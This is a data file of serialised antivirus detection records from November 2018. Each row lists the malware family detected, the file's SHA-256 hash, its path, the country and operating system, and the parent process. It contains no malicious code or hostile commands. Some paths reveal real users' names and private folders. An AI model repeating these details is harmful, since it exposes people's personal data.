  Row(detection=Row(filename='k4ijuahy33u73ootmk.exe', filepath='F:\\SzPzl0zs5yzLQXV8lE01454uFe3F54f8yhE\\k4IjUahy33u73oOtmk.exe', filesize=64000, name='TR/Dropper.Gen.#M300.#R3510'), hash='ef6cb4ac9bf0c6aeed67213b8096b15e5b6d77e62b1000705016aca1c7c252be', metadata=Row(cmdline=None, country='EC', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-01T03:48:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dynasty.exe', filepath='\\?\\J:\\العاب2\\جميع انواع الزوما\\Zumma4\\Dynasty.exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='bc473357ac8f229a05cb3231ceebcc70d23cf3fc5d23704c9f2c51f04ecd6a3d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T19:12:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='hpscans.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\HPSCANS\\HPSCANS.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:32:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='f12d1a47253f323bc30873cfcb535d66a338a562c86a73383353e561c8ccce33', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-31\\F12D1A47253F323BC30873CFCB535D66A338A562C86A73383353E561C8CCCE33', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='f12d1a47253f323bc30873cfcb535d66a338a562c86a73383353e561c8ccce33', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T14:48:46Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-152912-dc31814f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3db4e496\\AVSCAN-20181101-145735-7096FD0F\\AVSCAN-20181101-152912-DC31814F', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:29:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='verval ktt.pif', filepath='F:\\VerVal KTT\\VerVal KTT.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='8f550c00679c6f6e4a3914e9ee9b031c968915e891283e79fe284934158d53aa', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\SMADAV\\SMΔRTP.exe', parentsize=1977424, timestamp='2018-11-01T07:45:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\30hs5r4f10i\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:16:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='31d7.tmp', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\31D7.tmp', filesize=896000, name='TR/Crypt.XPACK.Gen4.#M300.#R300219'), hash='f1fdf5a690618f86263b03a073592cd58c12fbca0354d113ecb97bdfe419cc72', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:35:15Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-172025-2b29d495', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cb3b4272\\AVSCAN-20181101-171855-1B630B0D\\AVSCAN-20181101-172025-2B29D495', filesize=1024000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='ea84e431e8bae52113bd4e10307b7ecb9001482c800d43d1695cbf4671fc5420', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:20:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trzc36d.tmp', filepath='\\\\?\\C:\\Applications\\trzC36D.tmp', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T03:59:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='fwdl.exe', filepath='C:\\Users\\X\\Desktop\\SEHAM (E)\\my bag\\hp 1000\\Italiano\\fwdl.exe', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='d753cf36bb71429a89bba8233db998fb62cc290b1b96f31aa288368410c8b03c', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:BeV\\\\\\/wTsNxkGHJFkR.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-01T09:22:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a97f619197743a38e1c86adadc9762d8ce2fe76050a622b3e8f6ba94d5952929', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-33\\A97F619197743A38E1C86ADADC9762D8CE2FE76050A622B3E8F6BA94D5952929', filesize=372000, name='TR/Dropper.Gen.#M300.#R2295'), hash='a97f619197743a38e1c86adadc9762d8ce2fe76050a622b3e8f6ba94d5952929', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:15:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-194221-2cdea660', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-194206-2B30998F\\AVSCAN-20181101-194221-2CDEA660', filesize=9216000, name='TR/Strictor.mvpk.#M1.#R1'), hash='d242860cabdb5fcd0bfeeba7e64751f2a37387615fe06bf7c65c0a39b3a1ef08', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:42:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pstilldll.dll', filepath='C:\\Documents and Settings\\X\\Application Data\\com.aspexsoftware.Silhouette_Studio.8\\pstill\\pstilldll.dll', filesize=1344000, name='W32/Ramnit.CD.#M1.#R1'), hash='350482e20a6e9e9ef4effdaca92c12f83085ed5a520ac050e5eebd9b347c7240', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:23:13Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-074926-53a9535b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181104-074856-4E4D7394\\AVSCAN-20181104-074926-53A9535B', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T00:50:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\\\\\/LOGFILE=\\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Avira\\\\\\\\Antivirus\\\\\\\\LOGFILES\\\\\\\\AviraSecurityCenterAgent-2018-11-04-10-30-56.log\\\\\\" \\\\\\/LOGLEVEL=\\\\\\"STANDARD\\\\\\" \\\\\\/UPDATE_WSC=\\\\\\"ENABLE\\\\\\" \\\\\\/VDFDATE=\\\\\\"2018-10-31T00:00:00\\\\\\" \\\\\\/TRIGGER=\\\\\\"gpschd.dll Cyclic Check\\\\\\"', country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', parentsize=840000, timestamp='2018-11-04T11:50:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='19094e3e2f97bd9f2088fb08f82b9c028a62d12bfce2e9b422e554066cc10a3e', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T12:03:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='~6a3aed0e.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6a3aed0e.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='a945807b163eb02475abfc4d31f3fbba141e665868c164f047895c7aa9af58f3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-04T00:09:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tobii_firmware_upgrade.dll', filepath='\\\\?\\C:\\Program Files (x86)\\Tobii\\Service\\tobii_firmware_upgrade.dll', filesize=128000, name='HEUR/APC.#M1.#R1'), hash='a1d6b8cd7cb92d828f99be298044c4d07386481636387045607f4c73a15ab4b8', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T20:32:26Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='setup[1].exe', filepath='\\?\\C:\\Documents and Settings\\X\\Local Settings\\Temporary Internet Files\\Content.IE5\\GRQ0L25V\\setup[1].exe', filesize=14276000, name='HEUR/AGEN.1014167.#M1.#R1'), hash='0402376851d7aee89bb11345fa44275ce23839aaffc66e61ca64ef81d570c807', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:05:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Downloads\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CY.#M1.#R1'), hash='53f241e48edce037f68543a11c57cf05e084d97d6dc173ac163fec4d9fd50b02', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=345088, timestamp='2018-11-04T17:48:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered diril', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered diril', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='3265b893255a028475c06bee23f3fb1c9b1a3d1fbc7f50632a0bc55a13031cc0', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T10:54:03Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='dx-ball .exe', filepath='E:\\العاب\\Dx-ball3\\Dx-ball .exe', filesize=256000, name='HEUR/AGEN.1006141.#M1.#R1'), hash='7d75d6ed93694d17ce865f13cda5a6846929eeb8f8eb072b2a90e68666acd887', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\AVAST Software\\Avast\\AvastSvc.exe', parentsize=325024, timestamp='2018-11-04T15:53:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:50:58Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files (x86)\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-03-15-44-47.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-20T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T23:36:22Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132032-4153c6d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132032-4153C6D0', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:20:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-04-10-30-56.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-31T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='TN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-04T12:00:57Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-163442-a58180cc', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_be0b2051\\AVSCAN-20181104-163338-9A03650D\\AVSCAN-20181104-163442-A58180CC', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='43877a9f5547e0026d047c4a9e046cba684c1fc74edbe3907a6e0292aca1ce6d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T15:34:44Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-161148-b06a2020', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-161148-B06A2020', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:11:52Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-132706-5f21c42a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e41ed6c7\\AVSCAN-20181104-130254-F168F468\\AVSCAN-20181104-132706-5F21C42A', filesize=704000, name='Worm/IRCBot.ms.70.#M1.#R1'), hash='9bae2ceb5837b566649673b6901c8972db02bace8d10a9c9fbdc32fab0b5988f', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T19:27:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0002444b', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2532\\tmp000004cb\\tmp0002444b', filesize=256000, name='HEUR/AGEN.1014173.#M1.#R1'), hash='9c4d032e352d7f2bf17d974642258620bff3144a84199019f5cbe1053932c674', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\epsecurityservice.exe', parentsize=98136, timestamp='2018-11-04T20:51:37Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='4b525aaa4ae479f3c4bdabc51ca3b966be9d881f74cc7f3e840b73e413ccef6d', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T06:00:04Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-193731-5343bbc8', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d78ce995\\AVSCAN-20181104-192917-19E5130F\\AVSCAN-20181104-193731-5343BBC8', filesize=192000, name='TR/Crypt.ZPACK.Gen2.#M1.#R1'), hash='65f0003ea06ad84804be978a6f5ccc34aedb28f1e4ae2717c206fee32d098ddf', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:37:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='mssys.exe', filepath='C:\\Windows\\System\\sys\\syscon\\mssys.exe', filesize=1024000, name='APPL/EAMonitor.44e66f.#M1.#R1'), hash='44e66fc342c4470a94caa04d3c0530327391e07636707f007987849a7429dd2c', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System\\sys\\syscon\\mssys.exe', parentsize=1024000, timestamp='2018-11-04T19:12:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-162510-ff976294', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b975dbb4\\AVSCAN-20181104-160932-A304E1F8\\AVSCAN-20181104-162510-FF976294', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='PE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T21:25:09Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-225358-0c0cd113', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0ba9276c\\AVSCAN-20181104-225328-0816FF94\\AVSCAN-20181104-225358-0C0CD113', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T21:53:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='flashupdate.exe', filepath='C:\\Users\\X\\Music\\flashupdate.exe', filesize=1536000, name='TR/CoinMiner.CK.#M1.#R1'), hash='39cee19d7a3a27e18697f46c37fdd5277c4b22524aa0784de20a211cac399800', metadata=Row(cmdline=None, country='GR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-04T11:55:11Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T12:58:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='adobelinguistic.dll', filepath='H:\\Archivos de programa\\Adobe\\Adobe Flash CS3\\AdobeLinguistic.dll', filesize=3072000, name='W32/Ramnit.C.#M1.#R1'), hash='d74ce6bd5d2e9c127ba604e08a835e34af4c44c77cb1dffab6ba18ee92f5e235', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T02:20:17Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='posteriza_install-downloader.exe', filepath='\\\\DATENSERVER\\Daten\\DR-ACER-HOME-Joerg\\20140817_181511\\DRIVEE\\Downloads\\posteriza_install-Downloader.exe', filesize=512000, name='PUA/DownloadSponsor.Gen.#M300.#R5738'), hash='47333a5fff555669fc1839f69f5e866732216ec9e3f332b2c218194ce682aa04', metadata=Row(cmdline='\\\\\\/factory,{ceff45ee-c862-41de-aee2-a022c81eda92} -Embedding', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T15:08:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='d0ff639a2672c1107ce002612be651ed5663218bad857da6435b5b0c0e76d08e', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\D0FF639A2672C1107CE002612BE651ED5663218BAD857DA6435B5B0C0E76D08E', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='d0ff639a2672c1107ce002612be651ed5663218bad857da6435b5b0c0e76d08e', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:09:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='TR/Patched.Ren.Gen.#M300.#R2947'), hash='9c67d4b80f9a02748f4eafdfac44da2d649821c6110e678936d50dc459ecc596', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-04T04:20:49Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='coresys.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Roaming\\WinSys\\coresys.exe', filesize=512000, name='TR/Kryptik.xzcry.#M1.#R1'), hash='0d50249fa32ba88699979e3dd5cc4d34226f9206f8315c5a8ad4261a648834b0', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:38:39Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nsbE800.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='PL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-04T12:53:56Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181103-211213-054170aa', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_947ae14e\\AVSCAN-20181103-211151-015901F8\\AVSCAN-20181103-211213-054170AA', filesize=8000000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='325fcfaae8403873bd8772fa2c68a7e1a4b9ba82601c29b9be4663862cbc8e6d', metadata=Row(cmdline=None, country='TT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T01:12:15Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='yahoo! powered nolor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered nolor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='2f6ebf21da79db0779ace05500bac9a7b4cc61749d8f935cd23fbfcd87822827', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T21:14:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-180017-494e6ab5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_128ca42a\\AVSCAN-20181104-175947-4561E314\\AVSCAN-20181104-180017-494E6AB5', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:45:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='ahcremind.exe', filepath='C:\\Program Files\\Adobe\\Adobe Help Center\\ahcremind.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='8f7f27476ea1e5821a30c00a349d26bf38ff5d65cfbaa1cf62eb2af0b5e34ec9', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3811144, timestamp='2018-11-04T05:49:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:10Z'), dt=datetime.date(2018, 11, 4)),
